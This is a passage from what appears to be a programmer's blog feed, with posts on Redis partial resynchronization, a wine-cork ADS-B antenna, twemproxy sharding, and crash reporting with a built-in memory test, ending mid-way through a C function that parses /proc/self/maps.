A full resynchronization is required to reconnect. This was a design sacrifice, because after all we are dealing with RAM-sized data sets; it can't be that bad. But actually, as RAM gets cheaper and big users get more interested in Redis, we have many production instances with big data sets that need to fully resync at every network issue.

Also resynchronization involves unpleasant things:

1) The disk is involved, since the slave saving the RDB file needs to write that file somewhere.
2) The master is forced to create an RDB file. Not a big deal as this master is supposed to save or write the AOF anyway, but still, more I/O without a good reason.
3) The slave needs to block at some point after reconnection in order to load the RDB file into memory.

This time it was worth introducing some complexity in order to make things better.

# So now Redis sucks as well?

MySQL is surely one of the first databases I was exposed to, a long time ago, and the first time I had to set up replication I was shocked by how much it sucked. Are you serious that I need to enable binary logs and deal with offsets?

Redis replication, which everyone agrees is dead simple to set up, is more or less a response to how much I dislike MySQL replication from the point of view of the "user interface".

Even if we needed partial replication, I didn't want Redis to be like that.
However, to perform partial resynchronization, one way or the other you need something like this:

Hi Master! How are you? Remember that I used to be connected with you and we were such goooood friends?
Hey Slave! You still here piece of bastard...
Well, shut up and give me data starting from offset 282233943 before I signal you to the Authority Of The Lazy Databases.
Fu@**#$(*@($! ... 1010110010101001010100101 ...

So the obvious solution is to have a file on the master side with all the data, so that when a slave wants to resync we can provide any offset without problems, just reading it from the file. Except that this sucks a lot: we become append-to-disk-bound even if AOF is disabled, we need to deal with a file system that can get full or slow (hey EC2!), and with files to rotate one way or the other. Horrid.

So the following is a description of how the Redis partial resynchronization implementation again accepts sacrifices in order to avoid sucking like that.

# Redis PSYNC

Redis partial resynchronization makes two design sacrifices.
It accepts that the slave will be able to resynchronize only if:

1) It reconnects in a reasonable amount of time.
2) The master was not restarted.

Because of these two relaxed requirements, instead of using a file we can use a simple buffer inside our... memory! Don't worry, a very acceptable amount of memory.

So a Redis master is modified in order to:

* Unify the data that is sent to the slaves, so that every slave receives exactly the same stream. We were almost there already, but SELECT and PING commands were sent in a slave-specific fashion. Now the replication output to slaves is unified.
* Keep a backlog of what we send to slaves. So for instance we keep 10 MB of past data.
* Keep a global replication offset, which the user never needs to deal with. We simply provide this offset to the slave, which will increment it every time it receives data. This way the slave is able to ask for a partial resynchronization indicating the offset to start from.

Oh, also, we don't want the system to be fragile, so we use the master "run id", a concept that was introduced in Redis in the past as a unique identifier of a given instance execution. When the slave synchronizes with the master, it also gets the master run id, so that a later partial resynchronization attempt will be made only if the master is the same, as in, the exact same execution of Redis.

Also, the PSYNC command was introduced as a variant of SYNC for partial-resync-capable instances.
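A toy model of the master-side backlog may help to visualize the idea (a sketch in Python, in no way the real C implementation):

class ReplBacklog:
    def __init__(self, size):
        self.size = size            # e.g. 10 MB of recent replication stream
        self.buf = bytearray(size)  # circular buffer
        self.offset = 0             # global offset of the next byte to write

    def feed(self, data):
        # Append replication stream bytes, overwriting the oldest ones.
        for b in data:
            self.buf[self.offset % self.size] = b
            self.offset += 1

    def can_psync(self, slave_offset):
        # Partial resync is possible only if everything from the slave's
        # offset onward still fits inside the circular buffer.
        return 0 <= self.offset - slave_offset <= self.size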

# How does all this work in practice?

When the slave gets disconnected, you'll see something like this:

[60051] 17 Jan 16:52:54.979 * Caching the disconnected master state.
[60051] 17 Jan 16:52:55.405 * Connecting to MASTER...
[60051] 17 Jan 16:52:55.405 * MASTER <-> SLAVE sync started
[60051] 17 Jan 16:52:55.405 * Non blocking connect for SYNC fired the event.
[60051] 17 Jan 16:52:55.405 * Master replied to PING, replication can continue...
[60051] 17 Jan 16:52:55.405 * Trying a partial resynchronization (request 6f0d582d3a23b65515644d7c61a10bf9b28094ca:30).
[60051] 17 Jan 16:52:55.406 * Successful partial resynchronization with master.
[60051] 17 Jan 16:52:55.406 * MASTER <-> SLAVE sync: Master accepted a Partial Resynchronization.

See the first line: the slave *caches* the master client structure, so that all the buffers are saved, ready to be reused if we are able to resynchronize.

On the master side we'll see instead:

[59968] 17 Jan 16:52:55.406 * Slave asks for synchronization
[59968] 17 Jan 16:52:55.406 * Partial resynchronization request accepted. Sending 0 bytes of backlog starting from offset 30.

So basically, as long as the data is still available in the backlog, that is, no more than N bytes worth of Redis protocol (write commands) were sent to the slaves since the disconnection, the slave will still be able to reconnect and partially resync. Otherwise a full resynchronization is performed. How much backlog to allocate is up to the user.

# Current status

The 'psync' branch on my private repository now seems to work very well, however this is Very Important Code and must be tested a lot. This is what I'm doing right now. When I'm considerably sure the code is solid, I'll merge it into the unstable and 2.8 branches. When it runs for weeks without issues and starts to be adopted by the brave early adopters, we'll release 2.8 with this and other new features.
http://antirez.com/news/47
ADS-B wine cork antenna http://antirez.com/news/46 http://antirez.com/news/46 Sun, 16 Dec 2012 15:38:36 +0000
About one week ago I received my RTLSDR dongle, joining the already copious crew of software defined radio enthusiasts.

It's really a lot of fun. For instance, from my home, which is about 10 km from the Catania Airport, I can listen to the tower talking with the aircraft on the 118.700 MHz frequency with AM modulation. However, because of lack of time, I was not able to explore this further until last Sunday.

My Sunday goal was to use the RTLSDR to see if I was able to capture some ADS-B messages from the aircraft landing at or leaving the airport. Basically ADS-B is a safety device installed in most aircraft, used for collision avoidance and similar things. Every aircraft broadcasts information about heading, speed, altitude and so forth.

With software defined radio there are a lot of programs to demodulate this information (which is encoded in a fairly simple to decode format). I use "modes_rx", which is free software; just Google for it.

However, these transmissions happen on the 1090 MHz frequency. Neither my toy antenna nor the other rabbit ears antennas I had at home worked at all at this frequency, so I read a few things on Google and tried a simple design that actually works well and takes 10 minutes to build, using just a bit of wire and a wine cork.

# Wine cork dipole antenna

Sorry, but I know almost nothing about antennas. However I'll try to provide the information I have about the theoretical aspects of this antenna.

Technically speaking this antenna is a Half Wavelength Dipole. In practical terms it is two aligned parallel pieces of wire with a small gap between them, with a total length that is half the wavelength of the frequency I want to listen to.

Speed of light = 300,000,000 meters per second
Frequency I want to listen to = 1090 MHz, that is, 1,090,000,000 hertz
Wavelength at that frequency = 300,000,000 / 1,090,000,000 = 275 millimeters

Half of 275 millimeters is more or less 137 millimeters, so this is the total length of our antenna:

img://antirez.com/misc/1090_antenna_1.jpg
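Translated into code, the sizing is just this (a trivial sketch of the arithmetic above):

C = 300000000.0   # speed of light, meters per second
f = 1090000000.0  # ADS-B frequency, hertz
wavelength_mm = C / f * 1000    # ~275 mm
dipole_mm = wavelength_mm / 2   # total antenna length, ~137 mm
element_mm = dipole_mm / 2      # each of the two wires, ~69 mm
print(dipole_mm, element_mm)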

Now you may ask: why half the wavelength? Even for a n00b like me this actually makes a lot of sense; look at this:

img://antirez.com/misc/1090_antenna_4.jpg

Basically, if you imagine a sinusoidal wave, when one of the two pieces of the antenna is hit by the *high* part of the wave, the other is in the *low* part, and I guess that by induction this creates the current.

Ok, end of broscience for today.

# How to build it

Simply take two pieces of wire of 10 centimeters each, and insert them into the cork. Then bend the two wires to match the design in the picture, trying to keep the gap between the two wires small enough. Finally cut the two wires so that they are more or less the same length, for a total of 137 millimeters.

On the other side of the cork I connected the two wires that go to the RTLSDR. I'm so lazy that I didn't even solder the wires... You probably should!

img://antirez.com/misc/1090_antenna_2.jpg

Finally the two connected wires go to a PAL-style connector like this:

img://antirez.com/misc/1090_antenna_3.jpg

That in turn is connected to an adapter for the much smaller connector on the RTLSDR USB dongle. Even with all these interruptions along the path I can receive many aircraft like a boss, even from indoors, like this:

(-51 0.0000000000) Type 17 BDS0,9-1 (track report) from 3c6313 with velocity 299kt heading 129 VS -320
(-49 0.0000000000) Type 17 BDS0,5 (position report) from 3c6313 at (37.500388, 15.005891) at 9300ft
(-51 0.0000000000) Type 11 (all call reply) from 3c6313 in reply to interrogator 0 with capability level 6
(-51 0.0000000000) Type 17 BDS0,9-1 (track report) from 3c6313 with velocity 298kt heading 129 VS -320
(-51 0.0000000000) Type 17 BDS0,5 (position report) from 3c6313 at (37.499863, 15.006681) at 9300ft

... And so forth.

Have fun! And if you have tricks to make the antenna better while retaining the simplicity, please let me know.
http://antirez.com/news/46
Partial resyncs and synchronous replication. http://antirez.com/news/45 http://antirez.com/news/45 Tue, 11 Dec 2012 15:38:03 +0000
The idea is that we have a backlog of the replication stream, up to the specified amount of bytes (this will be in the order of a few megabytes by default).

If a slave loses the connection, it connects again, checks that the master RUNID is the same, and asks to continue from a given offset. If this is possible, we continue, nothing is lost, and a full resynchronization is not needed. Otherwise, if the offset refers to data we no longer have in the backlog, we perform a full resync.

Now, what's interesting about this is that, to make it possible, both the slave and the master keep track of a global replication offset, counted from when the master was first started.

Now, if we provide a command that returns this offset, it is simple for a client to simulate synchronous replication in Redis: just send the query, ask for the offset (think MULTI/EXEC to do both at once), and then ask the slave for its offset. Because Redis replication has very low latency, the client can simply do an optimistic "write, read offset, read offset on slave", and the offset read on the slave will likely already be enough to continue (or we can read it again after a short pause).
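In pseudo-Python the optimistic scheme would look like this (OFFSET is a hypothetical command name, nothing like it exists yet; master and slave are assumed to be redis-py-like client objects):

import time

def synchronous_set(master, slave, key, value, timeout=0.05):
    master.set(key, value)
    target = master.execute_command('OFFSET')  # hypothetical command
    deadline = time.time() + timeout
    while time.time() < deadline:
        # Replication is low latency, so the first check is likely
        # to already succeed.
        if slave.execute_command('OFFSET') >= target:
            return True   # the slave processed at least up to our write
        time.sleep(0.001)
    return False          # not acknowledged within the timeout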

This is already something that could be useful, but I wonder if we could build something even better starting from that: a way to send Redis a command that blocks until the current replication offset is acknowledged by at least N connected slaves, and returns +OK when this happens.

I'm not promising that this will be available, as we need to understand how useful it is and how complex it would be, but from an initial analysis this could be trivial to implement fast and reliably... and it sounds pretty good.

More news ASAP.
http://antirez.com/news/45
Twemproxy, a Redis proxy from Twitter http://antirez.com/news/44 http://antirez.com/news/44 Mon, 03 Dec 2012 15:37:42 +0000
I have big plans about going distributed with the project, to the extent that I'm no longer evaluating any threaded version of Redis: from the point of view of Redis, a core is like a computer, so scaling across multiple cores or across a cluster of computers is conceptually the same. Multiple instances are a share-nothing architecture. Everything makes sense AS LONG AS we have a *credible way* to shard :-)

This is why Redis Cluster will be the main focus of 2013 for Redis, and finally, now that Redis 2.6 is out and is proving to be pretty stable and mature, it is the right moment to focus on Redis Cluster, Redis Sentinel, and other long awaited improvements in the area of replication (partial resynchronization).

However the reality is that Redis Cluster is not yet production ready and requires months of work. Still our users already need to shard data on multiple instances in order to distribute the load, and especially in order to use many computers to get a big amount of RAM ready for data.

The sole option so far was client-side sharding. Client-side sharding has advantages, as there are no intermediate layers between clients and nodes, nor routing of requests, so it is a very scalable setup (linearly scalable, basically). However, implementing it reliably requires some tuning, a way to keep the clients' configuration in sync, and the availability of a solid client with support for consistent hashing or some other partitioning algorithm.

Apparently there is big news in the landscape, and it has something to do with Twitter, where one of the biggest Redis farms deployed happens to serve timelines to users. So it comes as no surprise that the project I'm talking about in this blog post comes from the Twitter Open Source division.

Twemproxy
---

Twemproxy is a fast single-threaded proxy supporting the Memcached ASCII protocol and more recently the Redis protocol:

https://github.com/twitter/twemproxy

It is written entirely in C and is licensed under the Apache 2.0 License.
The project works on Linux and AFAIK can't be compiled on OSX because it relies on the epoll API.

I did my tests using my Ubuntu 12.04 desktop.

But well, I'm still not saying anything useful. What does twemproxy actually do? (Note: I'll focus on the Redis part, but the project is also able to do the same for memcached.)

1) It works as a proxy between your clients and many Redis instances.
2) It is able to automatically shard data among the configured Redis instances.
3) It supports consistent hashing with different strategies and hashing functions.
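If you never met consistent hashing of the ketama flavor, the concept can be sketched in a few lines of Python (an illustration of the idea, not twemproxy's actual code):

import bisect, hashlib

class KetamaRing:
    def __init__(self, servers, points_per_server=40):
        self.ring = []  # sorted (point, server) pairs on a circle
        for s in servers:
            for i in range(points_per_server):
                h = hashlib.md5(('%s-%d' % (s, i)).encode()).digest()
                self.ring.append((int.from_bytes(h[:4], 'big'), s))
        self.ring.sort()

    def server_for(self, key):
        h = hashlib.md5(key.encode()).digest()
        point = int.from_bytes(h[:4], 'big')
        i = bisect.bisect(self.ring, (point,)) % len(self.ring)
        return self.ring[i][1]  # first server clockwise from the key

The nice property is that adding or removing a server only remaps the keys adjacent to its points on the circle, instead of reshuffling almost everything as a plain modulo would.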

What's awesome about Twemproxy is that it can be configured either to disable nodes on failure, and retry after some time, or to stick to the specified keys -> servers map. This means that it is suitable both for sharding a Redis data set when Redis is used as a data store (disabling node ejection), and when Redis is used as a cache, enabling node ejection for cheap (as in simple, not as in bad quality) high availability.

The bottom line here is: if you enable node ejection, your data may end up on other nodes when a node fails, so there is no guarantee about consistency. On the other hand, if you disable node ejection you need a per-instance high availability setup, for example using automatic failover via Redis Sentinel.

Installation
---

Before diving deeper into the project features, I have good news: it is trivial to build on Linux. Well, not as trivial as Redis, but… you just need to follow these simple steps:

apt-get install automake
apt-get install libtool
git clone git://github.com/twitter/twemproxy.git
cd twemproxy
autoreconf -fvi
./configure --enable-debug=log
make
src/nutcracker -h

It is pretty trivial to configure as well, and there is sufficient documentation in the project github page to have a smooth first experience. For instance I used the following configuration:

redis1:
  listen: 0.0.0.0:9999
  redis: true
  hash: fnv1a_64
  distribution: ketama
  auto_eject_hosts: true
  timeout: 400
  server_retry_timeout: 2000
  server_failure_limit: 1
  servers:
   - 127.0.0.1:6379:1
   - 127.0.0.1:6380:1
   - 127.0.0.1:6381:1
   - 127.0.0.1:6382:1

redis2:
  listen: 0.0.0.0:10000
  redis: true
  hash: fnv1a_64
  distribution: ketama
  auto_eject_hosts: false
  timeout: 400
  servers:
   - 127.0.0.1:6379:1
   - 127.0.0.1:6380:1
   - 127.0.0.1:6381:1
   - 127.0.0.1:6382:1

Basically the first cluster is configured with node ejection, and the second as a static map among the configured instances.

What is great is that you can have multiple setups at the same time, possibly involving the same hosts. However, for production I find it more appropriate to use multiple instances in order to use multiple cores.

Single point of failure?
---

Another very interesting thing is that, actually, using this setup does not mean you have a single point of failure, since you can run multiple instances of twemproxy and let your client connect to the first available.

Basically what you are doing with twemproxy is to separate the sharding logic from your client. At this point a basic client will do the trick, sharding will be handled by the proxy.

It is a straightforward but safe approach to partitioning IMHO.

Given that Redis Cluster is currently not available, I would say it is the way to go for most users that want a cluster of Redis instances today. But read about the limitations before getting too excited ;)

Limitations
---

I think that twemproxy does it right, supporting neither multiple-key commands nor transactions. It is currently, AFAIK, even stricter than Redis Cluster, which instead allows MULTI/EXEC blocks if all the commands are about the same key.

But IMHO it's the way to go: distribute the subset you can distribute efficiently, and pose this as a design challenge to the user early, rather than investing a big amount of resources into "just works" implementations that try to aggregate data from multiple instances, but will hardly be fast enough once you start to have serious loads, because of the too-big constant times involved in moving data around.

However there is some support for commands with multiple keys. MGET and DEL are handled correctly. Interestingly MGET will split the request among different servers and will return the reply as a single entity. This is pretty cool even if I don't get the right performance numbers with this feature (see later).

Anyway, the fact that multi-key commands and transactions are not supported means that twemproxy is not for everybody, exactly like Redis Cluster itself. Especially since apparently EVAL is not supported (I think they should support it! It's trivial: EVAL is designed to work in a proxy like this because key names are explicit).

Things that could be improved
---

Error reporting is not always stellar. Sending an unsupported command closes the connection. Similarly, sending just a "GET" from redis-cli does not report any error about the wrong number of arguments, but hangs the connection forever.

However other errors from the server are passed to the client correctly:

redis metal:10000> get list
(error) WRONGTYPE Operation against a key holding the wrong kind of value

Another thing that I would love to see is support for automatic failover. There are many alternatives:

1) twemproxy is already able to monitor instance errors, count them, and eject a node when enough errors are detected. Well, it is a shame that it is not able to take slave nodes as alternatives and, instead of ejecting a node, use its slave just after sending it a SLAVEOF NO ONE command. This would turn it into an HA solution as well.

2) Alternatively, I would love it if it could work in tandem with Redis Sentinel, checking the Sentinel configuration regularly to update the servers table when a failover happens.

3) Another alternative is to provide a way to hot-configure twemproxy, so that on failovers Sentinel could switch the configuration of the proxy ASAP.

There are many alternatives, but basically, some support for HA could be great.

Performances
---

This Thing Is Fast. Really fast: it is almost as fast as talking directly with Redis. I would say you lose 20% of performance at worst.

My only issue with performance is that IMHO MGET could use some improvement when the command is distributed among instances.

After all, if the proxy has a similar latency to all the Redis instances (very likely), and the MGETs are sent at the same time, the replies will likely reach the proxy at about the same time. So I expected to see almost the same numbers with a distributed MGET as I see when I run the MGET against a single instance, but I get only 50% of the operations per second. Maybe it's the time needed to reconstruct the reply, I'm not sure.

Conclusions
---

It is a great project, and since Redis Cluster is not here yet, I strongly suggest Redis users give it a try.

Personally I'm going to link it in some visible place in the Redis project site. I think the Twitter guys here provided some real value to Redis itself with their project, so…

Kudos!
http://antirez.com/news/44
Redis Crashes http://antirez.com/news/43 http://antirez.com/news/43 Mon, 03 Dec 2012 15:37:19 +0000

I'm very serious about software reliability, and this is not just a good thing.
It is good in a sense, as I tend to work hard to ensure that the software I release is solid. At the same time I think I take this issue a bit too personally: I get upset if I receive a crash report that I can't investigate further for some reason, or that looks almost impossible to me, or that comes with an unhelpful stack trace.

Guess what? This is a bad attitude, because delivering bug-free software is simply impossible. We are used to thinking in terms of labels: "stable", "production ready", "beta quality". I think that these labels are actually pretty misleading if not put in the right perspective.

Software reliability is an incredibly complex mix of ingredients.

1) Precision of the specification or documentation itself. If you don't know how the software is supposed to behave, you have things that may be bugs or features. It depends on the point of view.
2) Amount of things not working according to the specification, or causing a software crash. Let's call these just software "errors".
3) Percentage of errors that happen to be in the subset of the software that is actually used and stressed by most users.
4) Probability that the conditions needed for a given error to happen are met.

So what happens is that you code something, and this initial version will be as good as you are meticulous as a programmer, or as good as your team and organization are if it is a larger software project involving many developers. But this initial version contains a number of errors anyway.

Then you and your users test, or simply use, this new code. All the errors that are likely to happen and to be recognized, because they live in the subset of the code that users hit the most, start to be discovered. Initially you discover a lot of issues in a short time; then every new bug takes more time to be found, probabilistically speaking, as it tends to live in the part of the code that is less stressed, or because the conditions needed to make the error evident are unlikely to be met.

Basically your code is never free from errors. "Alpha", "beta", "production ready", and "rock solid" are just names we assign to the probability we believe there is for a serious error to be discovered in a reasonable time frame.

Redis crashes
===

Redis users are not likely to see Redis crashing without a good reason (Redis will abort on purpose in a few exceptional conditions). However from time to time there are bugs in Redis that will cause a server crash under certain conditions.

What makes crashes different from other errors is that in complex systems crashes are the perfect kind of "hard to reproduce error". Bug fixing is all about creating a mental model of how the software works to understand why it is not behaving as expected. Every time you can trigger the bug again, you add information to your model: eventually you have enough information to understand and fix the bug.

Crashes in Redis happen in a long running program that interacts with many clients sending commands at different times, in a way that makes the sequence of commands and events very hard to reproduce.

Crashes stop the server, provide little clues, and are usually very hard to reproduce. This means little information, poor model of what is happening, and ultimately, very hard to fix bugs.

If this is not enough, crashes are not only bad for developers: they are also very bad for users, as the software stops working after a crash, which is one of the worst misbehaviors you can expect from a piece of software.

This is why I hate Redis (and other software) crashes.

Stack traces
===

Are there ways to make crashes more *friendly*?

If a crash is reproducible, and if the user has time to spend with you, possibly from a far away time zone, maybe you can make a crash more friendly with a debugger. If you are lucky enough that the data is not important for the user, you may also get a core dump (which contains a copy of the data set, in the case of Redis).

However most crashes will simply not happen again in a practical amount of time, or the user can't help debugging, or the data is too important to send you a core. So one of the first things I did to improve Redis crashes was to make the server print a stack trace when it crashes.

This is an example of what you get if you send DEBUG SEGFAULT to the server:

=== REDIS BUG REPORT START: Cut & paste starting from here ===
[32827] 26 Nov 15:19:14.158 # Redis 2.6.4 crashed by signal: 11
[32827] 26 Nov 15:19:14.158 # Failed assertion: <no assertion failed> (<no file>:0)
[32827] 26 Nov 15:19:14.158 # --- STACK TRACE
0 redis-server 0x0000000103a15208 logStackTrace + 88
1 redis-server 0x0000000103a16544 debugCommand + 68
2 libsystem_c.dylib 0x00007fff8c5698ea _sigtramp + 26
3 ??? 0x0000000000000000 0x0 + 0
4 redis-server 0x00000001039ec145 call + 165
5 redis-server 0x00000001039ec77f processCommand + 895
6 redis-server 0x00000001039f7fd0 processInputBuffer + 160
7 redis-server 0x00000001039f6dfc readQueryFromClient + 396
8 redis-server 0x00000001039e82d3 aeProcessEvents + 643
9 redis-server 0x00000001039e851b aeMain + 59
10 redis-server 0x00000001039ef33e main + 1006
11 libdyld.dylib 0x00007fff91ef97e1 start + 0
12 ??? 0x0000000000000001 0x0 + 1

... more stuff ...

[32827] 26 Nov 15:19:14.163 # --- CURRENT CLIENT INFO
[32827] 26 Nov 15:19:14.163 # client: addr=127.0.0.1:56888 fd=5 age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=0 qbuf-free=32768 obl=0 oll=0 omem=0 events=r cmd=debug
[32827] 26 Nov 15:19:14.163 # argv[0]: 'debug'
[32827] 26 Nov 15:19:14.163 # argv[1]: 'segfault'
[32827] 26 Nov 15:19:14.163 # --- REGISTERS
[32827] 26 Nov 15:19:14.163 #
RAX:0000000000000000 RBX:00007fb8e4800000
RCX:00000000000003e8 RDX:00007fff79804788
RDI:0000000000000000 RSI:0000000103a4e2bf
RBP:00007fff5c2194c0 RSP:00007fff5c2193e0
R8 :0000000050b37a62 R9 :0000000000000019
R10:0000000000000001 R11:0000000002000000
R12:0000000000026c0f R13:0000000103a6bc80
R14:00007fb8e3600000 R15:00007fb8e3600178
RIP:0000000103a16544 EFL:0000000000010246
CS :000000000000002b FS:0000000000000000 GS:0000000000000000
[32827] 26 Nov 15:19:14.164 # (00007fff5c219458) -> 00007fb8e3600000
[32827] 26 Nov 15:19:14.164 # (00007fff5c219450) -> 0000000000000001
[32827] 26 Nov 15:19:14.164 # (00007fff5c219448) -> 0000000000000000
[32827] 26 Nov 15:19:14.164 # (00007fff5c219440) -> 00007fff5c219470

... more stuff ...

And a lot more, including the INFO output and the full list of connected clients and their state.

Printing stack traces on crash is already a huge improvement over "segmentation fault, core dumped". A lot of times I can fix the issue just from the output I see, without asking the user anything. Add to this that we have the arguments of the currently executed command.

I'm crazy enough that Redis logs the registers and part of the stack as well. If you have this trace, and a copy of the redis-server executable that produced it (and users will easily send it to you), you can inspect a lot of state just from that.

EVERY MISSION CRITICAL SOFTWARE should do this.
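For the curious, the core of this machinery is small: on Linux and OSX the execinfo.h functions backtrace() and backtrace_symbols_fd() do the heavy lifting of collecting and symbolizing the frames. The following is a minimal sketch of the general technique, not the actual Redis handler (which, as shown above, also dumps registers, the client state and the INFO output):

#include <execinfo.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>

/* Minimal crash handler sketch: on SIGSEGV print a symbolic stack
 * trace to stderr, then restore the default action and re-raise the
 * signal so that a core dump can still be produced. */
static void segv_handler(int sig) {
    void *frames[100];
    int n = backtrace(frames, 100);
    const char *msg = "--- STACK TRACE\n";

    write(STDERR_FILENO, msg, strlen(msg));
    /* backtrace_symbols_fd() writes straight to a file descriptor:
     * no malloc(), which is important inside a signal handler. */
    backtrace_symbols_fd(frames, n, STDERR_FILENO);

    signal(sig, SIG_DFL);
    raise(sig);
}

int main(void) {
    signal(SIGSEGV, segv_handler);
    *(volatile int *)0 = 1; /* force a segfault to trigger the handler */
    return 0;
}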

Broken memory
===

So far so good. That kind of reporting on crashes, plus a gentle and helpful community of users, can help you improve the quality of the software you ship, a lot. But what happens if the bug is a hard one? A memory violation in a random place, like a dictionary lookup in the context of a simple GET operation? Well, you are in big trouble. You can't ignore a bug like that, but inspecting it takes a lot of time.

And guess what? Many times you do a lot of work for nothing, as Redis crashed simply because the user was using broken memory.

Think along these lines: Redis uses a lot of memory, and memory errors easily amplify when you use a lot of data structures with pointers. If there is a broken bit, it will easily end up crashing the server in a short time.

Now let's scale this to the sum of all the memory that every single Redis instance out there is using right now. What you get is that Redis is like a parallel memory test running on many computers, waiting to spot some bit error. And as Redis gets more known and deployed, more memory is tested every second.

The problem is that this giant memory test will not write "Hey, you got a problem in your memory!". The output will be a new issue in the Redis GitHub issue system, and me investigating non-existing issues for hours.

First countermeasure
===

At some point, after the first endless investigations, I started to be smarter: when a bug looked suspicious I started the investigation with "Please, can you run a memory test to verify that the computer memory and CPU are likely ok?".

However this requires the user to reboot the machine and run memtest86, or at least to install some user-space memory testing program like memtester, available in most Linux distributions. Many times the user has no physical access to the box at all, or there is no "box" at all: the user is running Redis on a virtual machine somewhere.

After some time I realized that if Redis were able to test the computer's memory easily, without requiring additional software, I would receive many more memory test reports from users.

This is why recent Redis instances can perform a memory test if you start the server like this:

./redis-server --test-memory 4096

Where "4096" is the number of megabytes of RAM to test.

The test is not perfect, but it showed to be pretty effective at detecting common memory errors. However there are more subtle problems it does not detect, like retention errors: a retention error happens when you set some memory cell to a given value, wait some time, and then fail to read the same value back. But apparently most memory errors are simpler than that and can be detected more easily.

The quality of the detection also depends on the amount of time the user lets the memory test run. There are errors that just happen rarely.
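To give an idea of what such a retention test would look like, here is a hypothetical sketch (the retention_test() name and its parameters are mine; this is not something --test-memory implements, as said above):

#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical retention test: fill a region with a pattern, wait,
 * and only then verify it, so that cells losing their charge over
 * time have a chance to be caught. Returns 1 if an error was found,
 * 0 otherwise, -1 on allocation failure. */
int retention_test(size_t bytes, unsigned int wait_seconds) {
    size_t j;
    unsigned char *region = malloc(bytes);

    if (region == NULL) return -1;
    memset(region, 0xaa, bytes);   /* write the 10101010... pattern */
    sleep(wait_seconds);           /* give weak cells time to decay */
    for (j = 0; j < bytes; j++) {
        if (region[j] != 0xaa) {
            free(region);
            return 1;              /* retention error detected */
        }
    }
    free(region);
    return 0;
}

The catch is exactly the waiting time: to catch slowly decaying cells the test should sleep for minutes or hours, which is why users rarely run this kind of test for long enough.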

Anyway this test improved my experience with Redis crashes a lot. Sometimes I see a bug report, I just ask the user to test the RAM, and I get a message where the user acknowledges that there was a problem with a memory module.

However users rarely run a more accurate memory test like memtest86 for days, as they should after a crash. Many times it is simply not practical at all. So even when I get a "memory is fine" report, I simply accept it as a matter of fact that the memory is ok, and I investigate the issue closely. But if the crash was never reported at least one more time in recent times on different hardware, and there is no way to reproduce it, after some effort I'll simply stop investigating, keeping the issue open for some more time, and finally closing it if no other similar crashes are reported.

Testing more memory
===

Even without considering the false negatives, the current redis-server --test-memory approach has two bigger problems:

1) Not every user will actually run the test after a crash.
2) Users running Redis under virtualization, possibly with a provider like EC2, will never know if they are testing the same physical memory pages when they run redis-server --test-memory.

The first problem could be addressed simply using a policy: a crash without a memory test is not investigated if it looks suspicious. However this is not good for the Redis project nor for the users: sometimes a user will file a report and will simply have no more time to help us. Other times they can't stop the server. And we developers may miss the opportunity to track down a bug just because of a bad attitude and the mere possibility of a memory error.

The second problem, related to people using virtualization, is even worse: even when users want to help you, they can't do it in a reliable way.

So what about testing memory just when a crash happens? This would allow Redis to test the memory of every single computer where a crash has happened. The bug report would be annotated with the result of the test, providing an interesting hint about the state of the memory without further help from the user.

And even better, the test will check exactly the memory as allocated at the moment of the crash! It will test exactly the physical memory pages that Redis is using, which is just perfect for environments like EC2.

The problem is, how to do it?

How to test on crashes
===

My first idea was to test memory incrementally inside the allocator: from time to time, when some memory is allocated, run a fast memory test on it, and report it in the Redis log and in the INFO output if a problem is detected.

In theory it is nice, and I even implemented the idea. The problem is, it is completely unreliable. If the broken memory is allocated for something that is never deallocated later, it will never be tested again. Worse than that, it takes a lot of time to test the whole memory incrementally, small piece after small piece, and how do you test every single location? The allocator itself uses "internal" memory that is never exposed to the user, so we would miss all those pages.

Bad idea... and indeed the implementation I wrote was not working at all: the CPU cache made it completely useless, as testing small pieces of memory incrementally results in constant cache hits.

The second try was definitely better, and was simply to test the whole space of allocated memory, but only when a crash happens.

At first this looks pretty hard: you need a lot more help from the memory allocator you are using, and I don't think jemalloc has an out-of-the-box way to report the memory regions allocated so far. Also, if we are crashing, I'm not sure how reliable asking the allocator to report its memory regions would be: as a result of a single bit error, it is very easy to see the error propagating to random locations.

There are other problems. After a crash we want to be able to dump a meaningful core. If during the memory test we fill memory with patterns, the core file will be completely useless. This means that the memory test needs to be conceived so that at the end of the test the memory is left untouched.

The proc filesystem /proc/<pid>/maps
===

The Linux implementation of the proc filesystem makes Linux an exceptionally introspective operating system. A developer needs minimal effort to access information that is usually not exposed to user space. Actually the effort required is as small as parsing a text file.

The "maps" file of the proc filesystem shows line after line all the memory mapped regions for a given process and their permissions (read, write, execute).
The sum of all the reported regions is the whole address space that can be accessed in some way by the specified process.

Some of these maps are "special" maps created by the kernel itself, like the process stack. Other maps are memory mapped files like dynamic libraries, and others are simply regions of memory allocated by malloc(), obtained either via the sbrk() syscall or via an anonymous mmap().

The following two lines are examples of maps (obtained with "cat /proc/self/maps"):

7fb1b699b000-7fb1b6b4e000 r-xp 00000000 08:05 15735004 /lib/x86_64-linux-gnu/libc-2.15.so
7fb1b6f5f000-7fb1b6f62000 rw-p 00000000 00:00 0

The first part of each line is the address range of the memory mapped area, followed by the permissions "rwxp" (read, write, execute, private). Next is the offset in the case of a memory mapped file, then the device id (00:00 for anonymous maps), and finally the inode and file name for memory mapped files.

We are interested in checking all the heap-allocated memory that is readable and writable, so a simple grep will do the trick:

$ cat /proc/self/maps | grep 00:00 | grep rw

01cbb000-01cdc000 rw-p 00000000 00:00 0 [heap]
7f46859f9000-7f46859fe000 rw-p 00000000 00:00 0
7f4685c05000-7f4685c08000 rw-p 00000000 00:00 0
7f4685c1e000-7f4685c20000 rw-p 00000000 00:00 0
7fffe7048000-7fffe7069000 rw-p 00000000 00:00 0 [stack]

Here we can find both the heap allocated using the sbrk() system call, and the heap allocated using anonymous maps. However there is one thing that we don't want to scan: the stack. Otherwise the function that is testing the memory would itself easily crash.

So thanks to the Linux proc filesystem the first problem is no longer a big issue, and we use some code like this:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int memtest_test_linux_anonymous_maps(void) {
    FILE *fp = fopen("/proc/self/maps","r");
    /* Variable declarations elided in the original post, reconstructed
     * here from how they are used below. */
    char line[1024];
    unsigned long start_addr, end_addr, size;
    unsigned long start_vect[1024], size_vect[1024];
    int regions = 0;

    if (fp == NULL) return 0;
    while(fgets(line,sizeof(line),fp) != NULL) {
        char *start, *end, *p = line;

        /* Parse the "start-end" address range at the beginning
